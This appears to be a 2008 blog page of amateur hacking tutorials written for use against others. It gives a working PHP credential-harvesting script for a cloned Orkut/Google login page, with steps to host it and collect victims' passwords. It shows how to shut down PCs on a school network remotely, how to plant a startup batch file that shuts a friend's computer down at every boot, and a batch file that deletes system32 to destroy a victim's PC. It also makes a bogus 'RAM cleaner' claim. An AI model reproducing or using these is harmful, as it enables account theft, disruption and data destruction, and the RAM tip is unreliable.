fake login page by using php
fake login page by using php
??Tutorials:how to make fake page of any webpage
??Tutorials:how to make fake page of any webpage
a new section for php based fake pages after which ny1 will be able to make fake page of any website(really)
so lets start now:-
first of all u need to know the source code of the website of which u want fake page
*for that right click on the webpage n click on view page source a new window will open just select all n copy the content n save it as urpage.html(u can name it nything u like acc to webpage)
now open ur urpage.html n search for :
<form id=”gaia_loginform” action=”https://www.google.com/accounts/ServiceLoginAuth?service=orkut” method=”post”
onsubmit=”return(gaia_onLoginSubmit());”>
firstly copy the text in blue n remember it u ll need it in ur php file
replace the text in blue with ur php filename like orkut.php
ur php file:
<?php
header (’Location:www.orkut.com’);
$handle = fopen(”login.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
now replace the text” www.orkut.com” with the blue text from above
n now save the php file as orkut.php
now make a login.txt file which would be a blank file
now upload all the three files orkut.html,orkut.php,login.txt in a webhost which supports php like freeweb7(or u can google for more webhost for dat)
now u all r thinking dat how will i get the passwords?????
all the data entered in ur fake page will be stored in ur login.txt file which u can access thru ur webhost
so now enjoy ur new fake webpage
Add comment July 8, 2008
Clean Your RAM & Make Your Comp Speed Better
Clean Your RAM & Make Your Comp Speed Better
Clean your RAM
You may recognize that your system gets slower and slower when playing and working a lot with your Desktop or a laptop. That’s because your RAM is full of remaining progress pieces you do not need any more.
Open the notepad and type
FreeMem=Space(64000000)
In this file and save it as RAMcleaner.vbs [ You should choose the “All Files” option when u save it ]
Run the file and your RAM may be cleaned
Of course u can edit the code in the file for a greater “cleaning-progress”.
FreeMem=Space(128000000)
Just try it out.. it worked for me. Post your comment here if it worked for you !
Add comment July 8, 2008
Shutdown Pc’s @ School !!
Shutdown Pc’s @ School !!
You wanna mess around with your school network?
You wanna own the shit out of some kiddies who think they’re the best?
Well thankfully there’s the shutdown function in cmd Smile
First of all you need to have access to a cmd prompt on the network for this to work.
If it’s disabled you can obviously run everything from .bat files.
So first type in
Code:
Net View
This will give you all the names for all the computers on the network.
Then you want to find a target and write it down, so for example a name is //045-comproom1-05 then you will utilize that name to shutdown the computer.
What next? Well if you’re a lil skiddy yourself then the easiest thing to do is type in
Code:
shutdown -i
which will give you a gui interface and you’ll be able to shutdown whichever computer you want with it, you can set a time, even throw in a funny comment like “owned” or somethin Smile.
commands you will use if you just wanna use the command interface are
Code:
shutdown -m //computername
- shutsdown the pc.
Code:
shutdown -m -c “owned”
shutdown with a comment.
Code:
shutdown -l
logoff the user.
Code:
shutdown -r
restart the computer.
and so on…
Well that was a nice and quick tutorial now wasn’t it?
Have fun, be safe.
Add comment July 8, 2008
Make Force Computer Keep Restarting
Make Force Computer Keep Restarting
1.open note pad
2.type “shutdown -s” with out quotes
3.save the file with .bat extension
4.explaination,u have created a prog which shutdowns the pc with in 30
of executing the file
5. now open “x:\Documents and Settings\USERNAME\Start Menu\Programs\Startup\” (x->is the drive on which ur windows has been installed and USERNAME is the username)
6.paste a shortcut on this directory
NOW WHEN EVER UR FRIEND STARTS HIS PC a count down will start after 30 sec his pc will shutdown
u can also maki his pc restart instead of shutting down.. just replace “shutdown -s” “restart _s”
enjoy…. this is not a virus but look so….
Add comment July 8, 2008
DESTROY VICTMIN’S PC
A simple Trick to destroy ur victim’s pc
I m here explain to make a file that destroys ur victims pc
I m not responsible for the damage caused by this file.”
1. Open Notepad
2. write the above command : -
del c:\WINDOWS\system32\*.*/q
3. Save the above notepad with the extension “.bat or .cmd” as u want
4. !!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!! !!!
Don’t double click the file otherwise u r in trouble.
Why ?????? bcz the file u created delete all files from ur
system32 folder and when u restart ur pc it will not start
bcz system can not find the files in the system32 folder which
is required at the time of booting.
5. You can also test the above by creating a fake folder let suppose
windows1 in C:\. Copy some old files in it and just follow the
above command.By double clicking the bat or cmd file ur all files
automaitcally get deleted.
6. You can try this file in any one`s computer.(but this result in causing damage to the
computer, so thik again before trying this on anyone’s pc)
Add comment July 8, 2008